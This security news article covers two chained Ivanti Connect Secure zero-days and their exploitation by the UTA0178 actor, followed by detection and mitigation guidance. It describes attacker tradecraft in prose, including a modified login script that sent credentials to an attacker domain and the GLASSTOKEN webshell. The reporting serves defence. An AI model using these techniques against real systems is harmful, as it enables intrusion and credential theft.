Two zero-day vulnerabilities have been discovered in Ivanti Secure VPN, a popular VPN solution used by organizations around the world. The vulnerabilities are currently being exploited in the wild by at least one Chinese nation-state threat actor named UTA0178. The chaining of the two vulnerabilities allows any attacker to execute remote code without any authentication and compromise the affected systems.
What are Ivanti Secure VPN zero-day vulnerabilities?
Ivanti published an official security advisory and knowledge base article on two zero-day vulnerabilities, CVE-2023-46805 and CVE-2024-21887, affecting all supported versions of Ivanti Connect Secure (formerly known as Pulse Connect Secure). ) and Ivanti Policy Secure Gateways. .
- CVE-2023-46805 is an authentication bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure. Allows an attacker to access restricted resources by bypassing controls.
- CVE-2024-21887 is a command injection into Ivanti Connect Secure and Ivanti Policy Secure web components. It allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the device and can be exploited over the Internet.
When combined, these two vulnerabilities allow an attacker to execute commands on affected devices.
Patrice Auffret, founder, CEO and CTO of ONYPHE, a French cyber defense search engine dedicated to the discovery and management of attack surfaces, told TechRepublic in an email interview today that 29,664 Ivanti Secure VPN devices are connected to Internet. , with over 40% of systems on display in the US, followed by Japan (14.3%) and Germany (8.48%) (Figure A).
Figure A
Exploiting these zero-day vulnerabilities in the wild
American cybersecurity company Volexity discovered both vulnerabilities during an incident response investigation on multiple systems. Response to the incident revealed that a threat actor modified several files located on the Ivanti Connect Secure VPN device (Figure B).
Figure B
Volexity also believes that several files were created and used/executed in the system's temporary folder (/tmp), but were no longer available for investigation at the time of the incident response, such as:
- /tmp/rev
- /tmp/s.py
- /tmp/s.jar
- /tmp/b
- /tmp/kill
A Python-based proxy utility, PySoxy, believed to be s.py, was found on a disk image. It is a SOCKS5 proxy script freely available on the internet.
The threat actor, named UTA0178 by Volexity, deployed webshells and modified files to enable credential theft before moving from one system to another using the compromised credentials. The threat actor continued to collect newly collected credentials on each system it attacked and was observed dumping an entire image of the Active Directory database. Finally, the attacker modified the JavaScript loaded by the VPN device's web login page to capture any credentials that were provided. The legitimate lastauthserverused.js script was modified to send the stolen credentials to a domain controlled by the attacker: symantke(.)com.
Once in possession of the credentials, the threat actor scanned the network, examined user files and configuration files, and deployed more webshells to the network, including a custom webshell called GLASSTOKEN.
Custom GLASSTOKEN webshell
While the threat actor used several public and well-known tools, GLASSTOKEN was deployed in two slightly different versions.
The first version includes two code paths, depending on the parameters provided in the request. The first route is used to transmit a connection, while the second is used to execute code that is decoded to hexadecimal before being decoded to base64. According to Volexity's observations, the threat actor primarily used it to execute PowerShell commands.
The second version of the webshell is similar to the first, except that it lacks the proxy function and only allows code execution.
Volexity has provided the complete code for those webshells.
Threat detection
Analysis of network traffic.
Careful analysis of outgoing traffic from the VPN device can detect suspicious activity. Aside from the legitimate connection to pulsesecure.net and any other configured customer-related integrations (SSO, MFA, etc.), any suspicious activity should be analyzed. Examples observed by Volexity are curl requests to remote websites, SSH connections to remote IP addresses, or encrypted communications to hosts that are not associated with vendors or device updates.
Activity on incoming network traffic from the IP addresses associated with the VPN device should also be carefully checked. Suspicious traffic that could be observed on such connections could be RDP or SMB activity on internal systems, SSH connection attempts, or port scanning, to name a few.
VPN device log analysis
Any indication that VPN device log files have been deleted or disabled is a strong indicator of compromise, if they were previously active.
Requests for files in atypical paths in the logs should also be concerning and analyzed, as threat actors could store or manipulate files outside of the usual folders.
Integrity verification tool
The In-Build Integrity Check tool can be used to run automatically to detect new or mismatched files. As the Volexity researchers wrote, “if any new or mismatched files appear, the device should be considered compromised.”
Ivanti provides an external version of the Integrity Checker tool, which should be used in case the system is suspected of being compromised. The tool should only be installed and started after all system forensic evidence has been collected, in particular a memory image, because running the tool will reboot the device and possibly overwrite the evidence data.
Threat mitigation
Ivanti provides a mitigation method until a full patch is available. Ivanti notes that “patches will be released on a staggered schedule with the first version expected to be available to customers the week of January 22 and the final version expected the week of February 19.”
Mitigation consists of importing a mitigation.release.20240107.1.xml file through the download portal. Depending on the configuration, this operation could lead to system degradation, as indicated on the dedicated Ivanti page. It is highly recommended to carefully follow all Ivanti instructions and verify that the mitigation is working correctly.
Divulgation: I work for Trend Micro, but the opinions expressed in this article are my own.
